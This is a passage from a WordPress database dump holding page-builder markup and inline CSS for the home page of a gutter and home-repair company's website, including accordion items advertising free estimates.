32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Gutters</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>As a vital role in the overall protection of your home call today for a free estimate on new seamless aluminum gutters by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item -->\n\n<!-- wp:skt-blocks/accordion-item {\"block_id\":\"e4ac92de\",\"title\":\"Repairs\",\"content\":\"We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.\",\"borderStyle\":\"none\",\"titlePadding\":20,\"contentPadding\":20,\"className\":\"gb-renovation-tab\"} -->\n<div class=\"wp-block-skt-blocks-accordion-item skt-blocks-accordion-item__outer-wrap skt-blocks-block-e4ac92de gb-renovation-tab\" style=\"border-style:none;border-width:1px;border-radius:2px;overflow:hidden;box-shadow:9px 9px 9px 9px undefined \"><div class=\"skt-blocks-accordion-item__wrapper\"><div class=\"skt-blocks-accordion-item\" role=\"tab\" tabindex=\"0\"><div class=\"skt-blocks-accordion-titles-button skt-blocks-accordion-titles\" style=\"box-shadow:;padding:20px\"><span class=\"skt-blocks-icon skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H272V64c0-17.67-14.33-32-32-32h-32c-17.67 0-32 14.33-32 32v144H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h144v144c0 17.67 14.33 32 32 32h32c17.67 0 32-14.33 32-32V304h144c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-icon-active skt-blocks-accordion-icon-wrap\"><svg xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 448 512\"><path d=\"M416 208H32c-17.67 0-32 14.33-32 32v32c0 17.67 14.33 32 32 32h384c17.67 0 32-14.33 32-32v-32c0-17.67-14.33-32-32-32z\"></path></svg></span><span class=\"skt-blocks-title\">Repairs</span></div><div class=\"skt-blocks-accordion-content\"><span style=\"margin:0;padding:20px\"><p>We specialize in finding this and proceed swiftly to correctly fix the issues the first time. Call today for a free estimate on a repair quote by Dunrite.</p></span></div></div></div></div>\n<!-- /wp:skt-blocks/accordion-item --></div></div>\n<!-- /wp:skt-blocks/accordion --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPaddingMobile\":40,\"blockId\":\"8ade65a6-95be-43c3-a862-faf812de3e49\"} -->\n<style type=\"text/css\"> .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-8ade65a6-95be-43c3-a862-faf812de3e49 .skt-blocks-block-column{\n padding-top: 40px; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-8ade65a6-95be-43c3-a862-faf812de3e49\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:image {\"id\":20,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"https://cteisys.com/wp-content/uploads/2021/05/faq-img.jpg\" alt=\"\" class=\"wp-image-20\"/></figure>\n<!-- /wp:image --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6c332def-c8d3-4470-b49f-90dc1ba0fb14\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#f7f7f7\",\"backgroundType\":\"color\",\"boxShadowColor\":\"\",\"boxShadowPosition\":\"\",\"className\":\"gb-renovation-section-9\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-9 skt-blocks-block-section-outer-wrap block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.background-type-video .skt-blocks-block-section {\n background-color: rgba(247, 247, 247, 1); }\n</style><style type=\"text/css\"> .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6c332def-c8d3-4470-b49f-90dc1ba0fb14.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(247, 247, 247, 1);box-shadow:0px 0px 0px 0px  \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"dc07bcbb-e525-4314-b589-15be45dc4e59\"} -->\n<style type=\"text/css\"> .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-dc07bcbb-e525-4314-b589-15be45dc4e59 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-dc07bcbb-e525-4314-b589-15be45dc4e59 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"blockId\":\"d6b07e0e-145d-4fcf-b0ab-81e1597b2431\"} -->\n<style type=\"text/css\"> .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d6b07e0e-145d-4fcf-b0ab-81e1597b2431\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"a76f9b72-1972-4fc1-9508-94e879ce8fe8\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"separatorSpacingTablet\":35,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":17,\"headingTitleFontSizeMobile\":0,\"headingTitleFontWeight\":\"500\",\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":41,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 17px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 35px !important; }\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-title-text {\n font-size: 0px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 41px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a76f9b72-1972-4fc1-9508-94e879ce8fe8 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a76f9b72-1972-4fc1-9508-94e879ce8fe8\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\"></p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"bottomPaddingMobile\":30,\"blockId\":\"ee5678bf-92ed-4865-aa79-230e1108a2f5\"} -->\n<style type=\"text/css\"> .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-ee5678bf-92ed-4865-aa79-230e1108a2f5 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 30px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-ee5678bf-92ed-4865-aa79-230e1108a2f5\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"right\"} -->\n<div class=\"right tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap skt-blocks-buttons-stack-none\"><div class=\"skt-blocks-buttons__wrap skt-blocks-buttons-layout-wrap\"><!-- wp:skt-blocks/buttons-child {\"label\":\"\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\",\"counterId\":\"a5cb6a55-72ca-447b-9d80-e0be7d2f2b89\",\"hPadding\":25,\"vMargin\":20,\"hMargin\":0,\"borderRadius\":0,\"borderStyle\":\"none\",\"borderColor\":\"\",\"borderHColor\":\"\",\"color\":\"#ffffff\",\"background\":\"#fe8333\",\"hColor\":\"\",\"buttonFontFamily\":\"Poppins\",\"buttonFontSize\":15,\"hbackground\":\"#0d2e63\",\"buttonFontWeight\":\"600\",\"backgroundType\":\"color\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 20px !important; margin-bottom: 20px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-top: 10px; margin-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 0px !important; margin-right: 0px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 10px; margin-right: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n margin-left: 5px; margin-right: 5px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-top: 10px; padding-bottom: 10px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 25px; padding-right: 25px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\">\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n padding-left: 14px; padding-right: 14px; }\n}\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89.skt-blocks-button__wrapper .skt-blocks-button__link_child {\n color: #ffffff; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover .skt-blocks-button__link_child {\n color: ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper{\n border-color: ; border-radius: 0px; border-style: none; border-width: 1px; box-shadow: 0px 0px undefined ; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a{\n font-size: 15px; font-family: Poppins; font-weight: 600; line-height: undefined; opacity: 1; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover {\n border-color: ; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper {\n background-color: #fe8333; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper:hover {\n background-color: #0d2e63; }\n</style><style type=\"text/css\"> .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper .skt-blocks-button__icon svg{\n fill: #3a3a3a; width: 16px; height: 16px; }\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-button__wrapper:hover .skt-blocks-button__icon svg{\n fill: undefined; }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: 15px !important; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 .skt-blocks-buttons-repeater.skt-blocks-button__wrapper a {\n font-size: undefinedpx; }\n}\n</style><div class=\"skt-blocks-undefined skt-blocks-block-button skt-blocks-buttons__outer-wrap\"><div class=\"skt-blocks-a5cb6a55-72ca-447b-9d80-e0be7d2f2b89 skt-blocks-button__wrapper skt-blocks-button__effect-undefined\"><div class=\"skt-blocks-buttons-repeater skt-blocks-button__wrapper\"><a class=\"skt-blocks-button__link_child\" href=\"https://sktperfectdemo.com/themepack/gbrenovate/blog-full-width/\" rel=\"noopener noreferrer\" target=\"_blank\"></a></div></div></div>\n<!-- /wp:skt-blocks/buttons-child --></div></div>\n<!-- /wp:skt-blocks/buttons --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/skt-blocks-post-grid {\"postsToShow\":2,\"displayPostExcerpt\":false,\"displayPostAuthor\":false,\"postTitleTag\":\"h5\",\"readMoreText\":\"Read More\",\"bgColor\":\"#ffffff\",\"imageBorderRadius\":0,\"metaColor\":\"#6a6a6a\",\"readMoreLinkColor\":\"#fc8134\",\"titleColor\":\"#282828\",\"titleHoverColor\":\"#0d2e63\",\"contentPadding\":0,\"continueFontSize\":16,\"continueFontWeight\":\"600\",\"titleFontSize\":24,\"titleLineHeight\":1.2,\"titleFontWeight\":\"400\",\"metaFontSize\":16,\"metaFontWeight\":\"400\",\"metaTextTransform\":\"capitalize\",\"titleFontFamily\":\"Poppins\",\"metaFontFamily\":\"Poppins\",\"rowGap\":0,\"postGridBlockId\":\"eca83834\"} /--></div></section></div>\n<!-- /wp:skt-blocks/section -->','Home','','inherit','closed','closed','','336-revision-v1','','','2022-08-24 23:22:42','2022-08-24 23:22:42','',336,'https://cteisys.com/?p=488',0,'revision','',0),(480,1,'2022-08-24 18:08:06','2022-08-24 18:08:06','<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"f90851d4-c514-47ae-86e7-eec3151567da\",\"topPadding\":80,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":80,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"backgroundColor\":\"#ffffff\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-1\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-1 skt-blocks-block-section-outer-wrap block-f90851d4-c514-47ae-86e7-eec3151567da background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-f90851d4-c514-47ae-86e7-eec3151567da .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 80px; padding-bottom: 80px; padding-left: 10px; padding-right: 10px; }\n}\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-f90851d4-c514-47ae-86e7-eec3151567da.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n 